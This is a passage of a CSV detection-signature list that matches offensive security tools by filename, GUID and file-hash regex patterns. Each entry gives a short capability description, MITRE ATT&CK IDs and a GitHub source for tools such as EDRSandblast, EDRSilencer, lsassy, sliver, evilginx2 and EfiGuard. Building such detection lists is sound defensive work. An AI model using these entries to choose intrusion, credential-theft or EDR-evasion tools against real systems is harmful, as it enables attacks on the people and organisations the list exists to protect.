os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*EditC2Dialog.*",".{0,1000}EditC2Dialog\..{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*Edit-FileWMI*",".{0,1000}Edit\-FileWMI.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","8","791","142","2018-10-28T19:28:37Z","2016-05-24T14:00:14Z" "*EDR Detector by trickster0*",".{0,1000}EDR\sDetector\sby\strickster0.{0,1000}","offensive_tool_keyword","EDR_Detector","detect EDR agents on a machine","T1518.001 - T1063","TA0007 - TA0009","N/A","N/A","Collection","https://github.com/trickster0/EDR_Detector","1","0","N/A","7","1","78","15","2021-11-05T08:10:05Z","2019-08-24T20:50:09Z" "*EDR_Detection.exe*",".{0,1000}EDR_Detection\.exe.{0,1000}","offensive_tool_keyword","EDR_Detector","detect EDR agents on a machine","T1518.001 - T1063","TA0007 - TA0009","N/A","N/A","Collection","https://github.com/trickster0/EDR_Detector","1","1","N/A","7","1","78","15","2021-11-05T08:10:05Z","2019-08-24T20:50:09Z" "*EDR_Detector.7z*",".{0,1000}EDR_Detector\.7z.{0,1000}","offensive_tool_keyword","EDR_Detector","detect EDR agents on a machine","T1518.001 - T1063","TA0007 - TA0009","N/A","N/A","Collection","https://github.com/trickster0/EDR_Detector","1","1","N/A","7","1","78","15","2021-11-05T08:10:05Z","2019-08-24T20:50:09Z" "*EDR_Detector-master*",".{0,1000}EDR_Detector\-master.{0,1000}","offensive_tool_keyword","EDR_Detector","detect EDR agents on a machine","T1518.001 - T1063","TA0007 - TA0009","N/A","N/A","Collection","https://github.com/trickster0/EDR_Detector","1","1","N/A","7","1","78","15","2021-11-05T08:10:05Z","2019-08-24T20:50:09Z" "*edraser.py -*",".{0,1000}edraser\.py\s\-.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","172","29","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z" "*EDRaser-main*",".{0,1000}EDRaser\-main.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","172","29","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z" "*EDRSandblast.c*",".{0,1000}EDRSandblast\.c.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1361","264","2024-01-28T15:02:08Z","2021-11-02T15:02:42Z" "*EDRSandblast.exe*",".{0,1000}EDRSandblast\.exe.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1361","264","2024-01-28T15:02:08Z","2021-11-02T15:02:42Z" "*EDRSandblast.exe*",".{0,1000}EDRSandblast\.exe.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*EDRSandBlast.h*",".{0,1000}EDRSandBlast\.h.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*edrsandblast.py*",".{0,1000}edrsandblast\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*EDRSandblast.sln*",".{0,1000}EDRSandblast\.sln.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1361","264","2024-01-28T15:02:08Z","2021-11-02T15:02:42Z" "*EDRSandblast.sln*",".{0,1000}EDRSandblast\.sln.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*EDRSandblast.vcxproj*",".{0,1000}EDRSandblast\.vcxproj.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*EDRSandblast_API.c*",".{0,1000}EDRSandblast_API\.c.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*EDRSandblast_API.exe*",".{0,1000}EDRSandblast_API\.exe.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*EDRSandblast_API.h*",".{0,1000}EDRSandblast_API\.h.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*EDRSandblast_CLI*",".{0,1000}EDRSandblast_CLI.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1361","264","2024-01-28T15:02:08Z","2021-11-02T15:02:42Z" "*EDRSandblast_LsassDump*",".{0,1000}EDRSandblast_LsassDump.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1361","264","2024-01-28T15:02:08Z","2021-11-02T15:02:42Z" "*EDRSandblast_LsassDump.c*",".{0,1000}EDRSandblast_LsassDump\.c.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*EDRSandblast_LsassDump.exe*",".{0,1000}EDRSandblast_LsassDump\.exe.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*EDRSandblast_StaticLibrary*",".{0,1000}EDRSandblast_StaticLibrary.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1361","264","2024-01-28T15:02:08Z","2021-11-02T15:02:42Z" "*EDRSandblast-GodFault*",".{0,1000}EDRSandblast\-GodFault.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*EDRSandblast-master*",".{0,1000}EDRSandblast\-master.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1361","264","2024-01-28T15:02:08Z","2021-11-02T15:02:42Z" "*EDRSilencer.exe*",".{0,1000}EDRSilencer\.exe.{0,1000}","offensive_tool_keyword","EDRSilencer","A tool uses Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server","T1562.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/netero1010/EDRSilencer","1","1","N/A","10","9","876","119","2024-01-24T15:52:24Z","2023-12-26T04:15:39Z" "*ee0ef3b713324cc7b0d6406c194c4e563fdcbcdea330300844e30603969cbde3*",".{0,1000}ee0ef3b713324cc7b0d6406c194c4e563fdcbcdea330300844e30603969cbde3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ee29b50f82ac78854af1e014fe9986a9699f98683ca798092f6b51282c08d640*",".{0,1000}ee29b50f82ac78854af1e014fe9986a9699f98683ca798092f6b51282c08d640.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*ee2b096fee2d9337ce5b2e1506ffdae090833eefc634b73f22046679de392f05*",".{0,1000}ee2b096fee2d9337ce5b2e1506ffdae090833eefc634b73f22046679de392f05.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*EE64B207-D973-489B-84A8-B718B93E039B*",".{0,1000}EE64B207\-D973\-489B\-84A8\-B718B93E039B.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*ee6603f8abadc1b575b6c696caf487da5421ad772cf65b38f49c35630d34f09b*",".{0,1000}ee6603f8abadc1b575b6c696caf487da5421ad772cf65b38f49c35630d34f09b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*ee9f3bc75013e6741dde950888676f9c20134ed7a7607bd069da81727be1fa01*",".{0,1000}ee9f3bc75013e6741dde950888676f9c20134ed7a7607bd069da81727be1fa01.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*eea432f6f16df3514a6310b593ea8676d2330310d9181cda1e7c278ad53758b3*",".{0,1000}eea432f6f16df3514a6310b593ea8676d2330310d9181cda1e7c278ad53758b3.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*eeb9847bbb8fdb98a1454e6dcde4e4e685bf549e0ab42fab823ed5abf83de427*",".{0,1000}eeb9847bbb8fdb98a1454e6dcde4e4e685bf549e0ab42fab823ed5abf83de427.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*EEC35BCF-E990-4260-828D-2B4F9AC97269*",".{0,1000}EEC35BCF\-E990\-4260\-828D\-2B4F9AC97269.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","0","N/A","9","2","154","27","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" "*EEC48565-5B42-491A-8BBB-16AC0C40C367*",".{0,1000}EEC48565\-5B42\-491A\-8BBB\-16AC0C40C367.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042????","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "*eec5232b43748fc0c8a86e2b3e7b921e88b9aa0275a0ad3b4f719f8e468b1f95*",".{0,1000}eec5232b43748fc0c8a86e2b3e7b921e88b9aa0275a0ad3b4f719f8e468b1f95.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*eeriedusk/nysm*",".{0,1000}eeriedusk\/nysm.{0,1000}","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","1","N/A","10","3","205","36","2023-12-20T13:59:17Z","2023-09-25T10:03:52Z" "*ef0602ea7c5cfe523cd58fbfb20f835a908c5d3873fcb14510a042d13de53863*",".{0,1000}ef0602ea7c5cfe523cd58fbfb20f835a908c5d3873fcb14510a042d13de53863.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*EF143476-E53D-4C39-8DBB-A6AC7883236C*",".{0,1000}EF143476\-E53D\-4C39\-8DBB\-A6AC7883236C.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*ef377470d920bdd421679da6fa7dd8a4cd7445b22db2829419dd62be97131583*",".{0,1000}ef377470d920bdd421679da6fa7dd8a4cd7445b22db2829419dd62be97131583.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*ef5bf46dc35dcb1881a81107214ba85cafd4b3eb76e8a68b32005e9dd44d1371*",".{0,1000}ef5bf46dc35dcb1881a81107214ba85cafd4b3eb76e8a68b32005e9dd44d1371.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ef62b7afc565b06ed3c0a764f927ce9ccdc376c569c74c4c8ff1c977d89ef15e*",".{0,1000}ef62b7afc565b06ed3c0a764f927ce9ccdc376c569c74c4c8ff1c977d89ef15e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*ef881142422dd10c7ad27424ce2407312b3886c5ee940a4be17153caed6ccaff*",".{0,1000}ef881142422dd10c7ad27424ce2407312b3886c5ee940a4be17153caed6ccaff.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","0","N/A","10","3","212","43","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z" "*ef9bce2a5c2f623419be05c9090187cba082a208f7685bd93c349fe71cbad896*",".{0,1000}ef9bce2a5c2f623419be05c9090187cba082a208f7685bd93c349fe71cbad896.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ef9c57ffe31d8ceeb51daeac466dc8835807ab7d9fd3ff05ada8ce9b4836d924*",".{0,1000}ef9c57ffe31d8ceeb51daeac466dc8835807ab7d9fd3ff05ada8ce9b4836d924.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" "*efbglgofoippbgcjepnhiblaibcnclgk*",".{0,1000}efbglgofoippbgcjepnhiblaibcnclgk.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*efchatz/pandora*",".{0,1000}efchatz\/pandora.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","1","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*eff1f6144cbc0b092a09dc06009fc3709c937347d9b5991560588204fc183414*",".{0,1000}eff1f6144cbc0b092a09dc06009fc3709c937347d9b5991560588204fc183414.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","N/A","10","2","185","22","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z" "*effc137c4e7594fc3b3b5240c786ba3351e521bb7f9d14883dca6ff9db5f5f28*",".{0,1000}effc137c4e7594fc3b3b5240c786ba3351e521bb7f9d14883dca6ff9db5f5f28.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*EfiDSEFix.exe *",".{0,1000}EfiDSEFix\.exe\s.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*EFIGUARD_BACKDOOR_VARIABLE_NAME*",".{0,1000}EFIGUARD_BACKDOOR_VARIABLE_NAME.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*EfiGuard-v1.1.zip*",".{0,1000}EfiGuard\-v1\.1\.zip.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","1","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*EfiGuard-v1.2.zip*",".{0,1000}EfiGuard\-v1\.2\.zip.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","1","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*EfiGuard-v1.3.zip*",".{0,1000}EfiGuard\-v1\.3\.zip.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","1","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*EfiGuard-v1.4.zip*",".{0,1000}EfiGuard\-v1\.4\.zip.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense 